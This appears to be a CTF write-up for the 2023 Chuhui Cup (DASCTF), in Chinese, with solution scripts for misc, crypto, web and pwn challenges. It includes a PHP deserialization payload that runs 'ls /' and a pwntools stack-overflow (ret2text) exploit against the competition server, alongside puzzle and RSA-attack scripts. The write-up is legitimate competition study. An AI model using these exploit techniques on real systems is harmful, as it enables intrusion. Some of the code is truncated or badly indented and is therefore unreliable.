2023年楚慧杯(DASCTF)WP

怎么说呢，就是感觉比赛时间有点紧，3个小时15道题，然后还要结束前提交wp，就有点来不及，当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名，只能依靠积分来盲猜，这多少有点难受（我们队有段时间积分掉到0.7我还以为要淘汰了。。。）

最后以一题之差屈居第二

 MISC

ez_zip

 用这个B神的脚本解套娃压缩包

import io
import zipfile

with open("ez_zip的附件.zip", "rb") as f:
    data = f.read()

info = "taptap"

while True:
    with zipfile.ZipFile(io.BytesIO(data), "r") as zf:
        all_files_processed = True
        for i in zf.filelist:
            fileName = i.filename.encode("cp437").decode("gbk")
            if zipfile.is_zipfile(io.BytesIO(zf.read(i.filename))):
                print(fileName)
                data = zf.read(i.filename)
                all_files_processed = False
                
                info += f" {fileName.replace('.zip', '')}"
            else:
                print(fileName)
                with open(fileName, "wb") as f:
                    f.write(zf.read(i.filename))

        if all_files_processed:
            break

print(info)

 然后获得一个1.txt

加号改为1，-号改为0

二进制转ASCII获得flag

DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}

gb2312-80

 

先写脚本用点阵数据画图

from PIL import Image

def draw(s, ind):
    lt = list(s)
    i2 = Image.new("RGB", (16, 16))
    for h in range(16):
        for w in range(16):
            x = lt[h * 16 + w]
            color = (0, 0, 0) if x == '0' else (255, 255, 255)
            i2.putpixel((w, h), color)
    i2.save(str(ind) + ".png")

def trans(s):
    lt = s.split(',')
    out = ''.join(bin(int(x))[2:].zfill(16) for x in lt)
    return out

with open('cipher.txt', 'r') as f:
    for ind, line in enumerate(f):
        line = line.strip()
        draw(trans(line), ind)

 

 找到对应关系，然后找下对应关系，写脚本转换

dir = {
    '0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0':'0',
    '0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0':'1',
    '0,0,960,1632,3120,3120,48,48,96,192,384,784,1552,4080,0,0':'2',
    '0,0,960,1632,3120,48,96,448,96,48,48,3120,1632,960,0,0':'3',
    '0,64,192,448,960,704,1728,3264,3264,6336,8176,192,192,480,0,0':'4',
    '0,0,4080,3072,3072,3072,4032,3680,48,48,48,3120,1632,960,0,0':'5',
    '0,0,960,1632,3120,3072,3520,3680,3120,3120,3120,3120,1632,960,0,0':'6',
    '0,0,4080,4080,2096,96,192,192,384,384,768,768,768,768,0,0':'7',
    '0,0,960,1632,3120,3120,1632,960,1632,3120,3120,3120,1632,960,0,0':'8',
    '0,0,960,1632,3120,3120,3120,3120,1648,1008,48,3120,1632,960,0,0':'9',
    '0,0,0,0,0,0,1984,3168,96,2016,3168,3168,2008,0,0,0':'a',
    '0,0,3584,1536,1536,1536,2016,1560,1560,1560,1560,1560,3056,0,0,0':'b',
    '0,0,0,0,0,0,992,3120,3072,3072,3072,3120,2016,0,0,0':'c',
    '0,0,224,96,96,96,2016,3168,3168,3168,3168,3168,2000,0,0,0':'d',
    '0,0,0,0,0,0,992,3120,3120,4080,3072,3120,2016,0,0,0':'e',
    '0,0,240,408,384,384,2016,384,384,384,384,384,960,0,0,0':'f'
}
f = open('cipher.txt','r')
for line in f.readlines():
    line = line.strip('\n')
    print(dir[line],end='')
f.close()

得到的数据解一下hex另存为zip，发现有个hint.txt，里面还有点阵

from PIL import Image
def draw(s,ind):
    lt = list(s)
    i2=Image.new("RGB",(16,16))
    _ind = 0
    for h in range(16):
        for w in range(16):
            x = lt[_ind]
            if x == '0':
                i2.putpixel((w, h), (0,0,0))
            else:
                i2.putpixel((w, h), (255,255,255))
            _ind += 1
    i2.save(str(ind)+".png")

s = '''0000001000000000000000010000000001111111111111100100001000000010100010010010010000101000110010000100101100000100000011000001000001110111111100000000000100000000001000010000100000100001000010000010000100001000001000010000100000111111111110000010000000001000
0000100000010000111111111111100000010000000100000001000100010000001000010001000000100101000100000011111100010000011001010001010010100101111111100010010000000100001001000010010000100111111101000010010000000100001111000000010000100100000101000000000000001000
0000111111100000000010000010000000001000001000000000111111100000000010000010000000001000001000000000111111100000000000000000010011111111111111100000000100000000000010010010000000001001111100000000100100000000000101010000000000100011000001100100000011111100
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000011110000000000001111000000000000011000000000000000000000000000000110000000000000111100000000000011110000000000000110000000000000000000000000
0000000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000000011111000000000011000110000000011000001100000011000000011000001100000001100000110000000110000011000000011000001100000001100000110000000110000001100000110000000011000110000000000111110000000000000000000000000000000000000
0000000000000000000000000000000000111100000111000001100000001000000110000000100000011000000100000000110000010000000011000010000000001100001000000000011001000000000001100100000000000010100000000000001110000000000000010000000000000000000000000000000000000000
0000000000000000000000000000000000011111111110000000110000011000000011000000100000001100000000000000110000100000000011111110000000001100001000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110001111000000110000011000000011000001100000001100000110000000110000011000000011111111100000001100000110000000110000011000000011000001100000001100000110000000110000011000000111100011110000000000000000000000000000000000
0000000000000000000000000000000000111111111110000010000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000010000011000000011000001111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110011111000000110000110000000011000110000000001100110000000000110110000000000011111000000000001101110000000000110011100000000011000111000000001100001110000000110000011100000111100001111000000000000000000000000000000000
0000000000000000000000000000000000000000100000000000001110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000000011110000000000011001100000000011000011000000001100000000000000110111000000000011100110000000001100001100000000110000110000000011000011000000001100001100000000011001100000000000111100000000000000000000000000000000000000'''
lt = s.split('\n')
ind = 0
for i in lt:
    draw(i,ind)
    ind+=1

再转换一下，得到密码为ILOVEHZK16

 DASCTF{842a99305a07e6183830582d1740c1b1}

CRYPTO

so-large-e

读取公钥e,n

from Crypto.PublicKey import RSA
# 读取密钥文件
with open('pub.pem', 'r') as f:
key = RSA.importKey(f.read())
n=key.n
e=key.e
c =
6838759631922176040297411386959306230064807618456930982742841698524
6220168498072357260652721360436030271662490755600582326832301553466
1442956651130997785781513800429881513791372966233753537127701985619
3898546849896085411001528569293727010020290576888205244471943227253
000727727343731590226737192613447347860
print('n=',n)
print('e=',e)
n=
1165186793055152632908407067155796912139221692716345793275195629026
1354358262344960674154647292040199793004138855314190906948758946194
8798111698856100819163407893673249162209631978914843896272256274862
5014613210209619583670987591834871164174879226457826385108766097288
86007680825340200888068103951956139343723
e=
1134492478760713979112060700194959390881716967121827475021330631720
2156534578862726174095066589192265934002039722961932920452099909653
5909867327960323598168596664323692312516466648588320607291284630435
6822826307459476894319099984013895660819667534388697255836652943106
89820290368901166811028660086977458571233

e很大，Boneh和Durffe攻击

使用条件：

修改delta

# from __future__ import print_function
# import time
#
# ############################################
# # Config
# ##########################################
#
# """
# Setting debug to true will display more informations
# about the lattice, the bounds, the vectors...
# """
# debug = True
#
# """
# Setting strict to true will stop the algorithm (and
# return (-1, -1)) if we don't have a correct
# upperbound on the determinant. Note that this
# doesn't necesseraly mean that no solutions
# will be found since the theoretical upperbound is
# usualy far away from actual results. That is why
# you should probably use `strict = False`
# """
# strict = False
#
# """
# This is experimental, but has provided remarkable results
# so far. It tries to reduce the lattice as much as it can
# while keeping its efficiency. I see no reason

from Crypto.Util.number import long_to_bytes
c =
6838759631922176040297411386959306230064807618456930982742841698524
6220168498072357260652721360436030271662490755600582326832301553466
1442956651130997785781513800429881513791372966233753537127701985619
3898546849896085411001528569293727010020290576888205244471943227253
000727727343731590226737192613447347860
n=
1165186793055152632908407067155796912139221692716345793275195629026
1354358262344960674154647292040199793004138855314190906948758946194
8798111698856100819163407893673249162209631978914843896272256274862
5014613210209619583670987591834871164174879226457826385108766097288
86007680825340200888068103951956139343723
e=
1134492478760713979112060700194959390881716967121827475021330631720
2156534578862726174095066589192265934002039722961932920452099909653
5909867327960323598168596664323692312516466648588320607291284630435
6822826307459476894319099984013895660819667534388697255836652943106
89820290368901166811028660086977458571233
d=
6638223433976997289533369683177941184911459980322442665506941568300
36498673227937
m=long_to_bytes(int(pow(c,d,n)))
print(m)

matrixequation

直接上脚本

U = hint2/hint1
R = (hint3/U/hint1/U/hint1/U/hint1/U/hint1).inverse()
A = U.inverse()*E-R
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()'
flag = ''
for k in range(24):
    i, j = 5*k // 11, 5*k % 11
flag+=alphabet[A[i, j]]

E hint1 hint2 hint3按照ouput填即可

11行一个 矩阵

WEB

eaaeval

发现提交这个用户密码可以跳转到另一个页面dhwiaoubfeuobgeobg.php

通过目录爆破可以得到www.zip

反序列化，需要绕过

 

O:4:"Flag":2:{s:1:"a";s:2:"ls";s:1:"b";s:1:"/";}

执行ls /，看看flag在哪

 绕过限制查看flag.txt

 

PWN

ez_base

 

找到start函数然后找到我们的vuln函数

调试发现在sub    处存在栈溢出漏洞

 通过字符表的flag可以找到的后门函数

 

那么接下来就是很简单的ret2text

```python
from pwn import *
#p=process("./base")
p=remote("tcp.cloud.dasctf.com",23938)
p.recvuntil("2:decode")
p.sendline("1")
p.recvuntil("cin de_str:")
p.sendline("q"*0x28+p64(0x404911))
p.interactive()